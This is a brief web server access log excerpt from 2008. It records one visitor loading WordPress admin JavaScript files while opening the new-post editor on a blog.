63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-includes/js/jquery/ui.tabs.js?ver=3 HTTP/1.1" 200 22382 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-includes/js/wp-lists.js?ver=20080411 HTTP/1.1" 200 11635 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-admin/js/postbox.js?ver=20080128 HTTP/1.1" 200 549 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-admin/js/slug.js?ver=20080208 HTTP/1.1" 200 1741 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:04 -0700] "GET /blog/wp-admin/js/post.js?ver=20080422 HTTP/1.1" 200 6562 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
63.206.47.131 - - [18/Aug/2008:13:11:05 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1 HTTP/1.1" 200 12079 "http://dmulk.com/blog/wp-admin/post-new.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
